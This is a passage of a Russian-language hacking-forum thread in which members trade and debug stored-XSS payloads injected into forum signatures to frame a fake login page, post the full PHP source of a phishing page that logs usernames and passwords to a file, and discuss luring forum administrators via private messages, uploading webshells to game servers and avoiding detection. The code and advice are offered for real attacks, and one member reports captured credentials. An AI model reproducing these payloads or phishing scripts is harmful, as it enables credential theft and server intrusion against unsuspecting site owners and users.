Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 13.06.2010, 14:02   #91
 Разведчик
Аватар для BuSh1Do
 
BuSh1Do на правильном путиBuSh1Do на правильном пути
Регистрация: 15.04.2010
Сообщений: 44
Популярность: 142
Сказал(а) спасибо: 92
Поблагодарили 66 раз(а) в 32 сообщениях
Отправить сообщение для BuSh1Do с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Код:
[color="#FFFFFF"][acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://bush1do.freehostiaя олень/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
вставляю в подпись, а ссылку на фейк изменяет...это защита такая? ".com" изменяет на "я олень" =)

Последний раз редактировалось BuSh1Do; 13.06.2010 в 14:05.
 
Старый 13.06.2010, 14:20   #92
 Разведчик
Аватар для Rjay
 
Rjay никому не известный тип
Регистрация: 08.06.2010
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Rjay с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?
 
Старый 13.06.2010, 14:25   #93
 Разведчик
Аватар для BuSh1Do
 
BuSh1Do на правильном путиBuSh1Do на правильном пути
Регистрация: 15.04.2010
Сообщений: 44
Популярность: 142
Сказал(а) спасибо: 92
Поблагодарили 66 раз(а) в 32 сообщениях
Отправить сообщение для BuSh1Do с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от RjayПосмотреть сообщение
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?

вставляешь сюда вместо [Ссылки могут видеть только зарегистрированные пользователи. ]

Код:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color]
 
Старый 13.06.2010, 19:54   #94
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Если чесн, советую вам заменять в подписи эти символы какой-то картинкой или например текстом раздаю 6-тизнаки, так не палиться
 
Старый 26.06.2010, 05:52   #95
 Разведчик
Аватар для Me$$iah
 
Me$$iah никому не известный тип
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?
 
Старый 26.06.2010, 16:24   #96
Знатный Читер
 Рыцарь
Аватар для TakeThat
 
TakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражания
Регистрация: 03.08.2009
Сообщений: 391
Популярность: 1541
Сказал(а) спасибо: 225
Поблагодарили 458 раз(а) в 220 сообщениях
Отправить сообщение для TakeThat с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от Me$$iahПосмотреть сообщение
Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?

через че конектишься навикат чтоли? лутше конектся через шелл т.к от навиката пользы 0

Последний раз редактировалось TakeThat; 26.06.2010 в 16:31.
 
Старый 27.06.2010, 17:31   #97
обжигающий
 Главнокомандующий
Аватар для object
 
object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(
Регистрация: 17.11.2009
Сообщений: 1,062
Популярность: 64819
Золото Zhyk.Ru: 170
Сказал(а) спасибо: 1,456
Поблагодарили 2,062 раз(а) в 822 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Для самых ленивых , и не понятливых .
Снял видео . как залить шелл . С инструкцией (C) m0nk.


Как вы поняли из видео , тест был на severe-world.


[Ссылки могут видеть только зарегистрированные пользователи. ]
________________
Полные взломы игрулек VK:
Качок | Баббла Кадабра | Академия монстров | Клуб Искателей(?fix) | [HOT-NEW] Толстая птица онлайн
 
2 пользователя(ей) сказали cпасибо:
BlackWinG (27.06.2010), fesssi (27.06.2010)
Старый 28.06.2010, 19:44   #98
 Разведчик
Аватар для F4ll3nL0rD
 
F4ll3nL0rD на правильном пути
Регистрация: 05.12.2009
Сообщений: 46
Популярность: 80
Сказал(а) спасибо: 31
Поблагодарили 35 раз(а) в 19 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от L0stHorrorПосмотреть сообщение
Дошел до стадии, когда нужно залить фейк на хостинг, успешно залил, получился фейк, но при вводе каких-нибудь данных вида акк:пасс, у меня не перебрасывает с фейка на оригинальную страницу авторизации, хотя при этом в блокноте создается запись акк:пасс, которую я вводил. В чем может быть проблема?

Содержимое файла login.php
Код:
<?php
/*
Фейк был создан при помощи генератора ArxWFakeGen.
Автор программы ArxWolf.
Официальный сайт программы и новых версий http://webxakep.net
*/
$BASE="game.txt";
$IS_EMAIL=false;
$LOCATION="http://сайт_сервера/forum/";

$p0=$_REQUEST["UserName"];
$p1=$_REQUEST["PassWord"];
$headers = "";
$info="$p0:$p1:\n";

if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

$LOCATION="http://сайт_сервера/forum/";
Вот тут попробуй выставить [Ссылки могут видеть только зарегистрированные пользователи. ]
Еще возможно ты не регистрировался на форуме, а там запрещено просматривать форум, если ты не зарегистрировался и поэтому тебя перебрасывает на страничку авторизации.
 
Старый 28.06.2010, 19:46   #99
 Сержант
Аватар для IncubusX
 
IncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауру
Регистрация: 04.03.2010
Сообщений: 117
Популярность: 604
Сказал(а) спасибо: 213
Поблагодарили 111 раз(а) в 47 сообщениях
Отправить сообщение для IncubusX с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Всё равно когда ты заходишь [Ссылки могут видеть только зарегистрированные пользователи. ] то ты заходишь на [Ссылки могут видеть только зарегистрированные пользователи. ] по умолчанию. И только потом тебя переадресовывает куда нибудь.
 
Старый 28.06.2010, 20:05   #100
 Разведчик
Аватар для L0stHorror
 
L0stHorror неизвестен в этих краях
Регистрация: 20.03.2010
Сообщений: 5
Популярность: -59
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

F4ll3nL0rD, спасибо! Ошибка заключалась именно в этом.
IncubusX, на том форуме обязательна прибавка index.php, без него форум просто не откроется, т.е. вид [Ссылки могут видеть только зарегистрированные пользователи. ] не открывается, и с него не переадресовывает.

Добавлено через 24 минуты
Теперь уже вопрос по самому xss:
Код:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1)
{with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=
\x22+valid_until.toGMTString();document.write(\x22\x3Cifr*ame\x20src=http://ссылка_на_фейк/\x20frameborder=0\x20width=100%
\x20height=100%\x20scrolling=no\x3E\x3Cifr*ame\x3E\x22);document.close()}";eval(lol); 
]]текст_подписи[/acronym][/acronym]
Где тут ошибка?
x3Cifr*ame в коде есесно без *

Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?

А, вот, все работает, код нормальный) Просто нужно было подождать, пока в game.txt запишется акк:пасс.
Пошел работать дальше

Последний раз редактировалось L0stHorror; 28.06.2010 в 20:57. Причина: Добавлено сообщение
 
Старый 28.06.2010, 20:57   #101
Знатный Читер
 Рыцарь
Аватар для TakeThat
 
TakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражанияTakeThat блестящий пример для подражания
Регистрация: 03.08.2009
Сообщений: 391
Популярность: 1541
Сказал(а) спасибо: 225
Поблагодарили 458 раз(а) в 220 сообщениях
Отправить сообщение для TakeThat с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от L0stHorrorПосмотреть сообщение
Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?

Да он должен прочитать ваше сообщения плюс он должен попасть курсором по вашему фейку и тогда его перекинет на ваш фейк и если он тупой то он введет свои данные.
 
Пользователь сказал cпасибо:
IncubusX (28.06.2010)
Старый 28.06.2010, 23:05   #102
 Разведчик
Аватар для L0stHorror
 
L0stHorror неизвестен в этих краях
Регистрация: 20.03.2010
Сообщений: 5
Популярность: -59
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?

Добавил:

Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
 
Старый 28.06.2010, 23:27   #103
 Разведчик
Аватар для F4ll3nL0rD
 
F4ll3nL0rD на правильном пути
Регистрация: 05.12.2009
Сообщений: 46
Популярность: 80
Сказал(а) спасибо: 31
Поблагодарили 35 раз(а) в 19 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от L0stHorrorПосмотреть сообщение
Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?

Добавил:

Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?

1. Да именно браузер жертвы.Можно вставить сколько хочешь xss.
2.Если в браузере выставлено удалять кукисы через определенное кол-во дней или после завершения сеанса, то они удаляются.

Цитата:
Сообщение от L0stHorrorПосмотреть сообщение
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?

Просто удали кукисы и можешь попробовать.
 
Пользователь сказал cпасибо:
ProTocoL (03.07.2010)
Старый 06.07.2010, 14:49   #104
 Разведчик
Аватар для <Infin1ty>
 
<Infin1ty> никому не известный тип
Регистрация: 12.06.2010
Сообщений: 5
Популярность: 12
Сказал(а) спасибо: 0
Поблагодарили 1 раз в 1 сообщении
Отправить сообщение для <Infin1ty> с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Кому нужны сайты хостингов прошу : [Ссылки могут видеть только зарегистрированные пользователи. ]
________________
Помог , ты вить наешь что нуна нажать !?
 
Старый 09.07.2010, 07:43   #105
 Разведчик
Аватар для Восстание
 
Восстание вызывает надежду
Регистрация: 06.07.2010
Сообщений: 8
Популярность: -13
Сказал(а) спасибо: 2
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:
Цитата:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3Cifr*ame\x20src=ССЫЛКА НА МОЙ ФЕЙК\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]__________________________________________________ _________________________[/acronym]_[/acronym]

x3Cifr*ame естественно без *

Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные пользователи. ]
 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 06:02.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net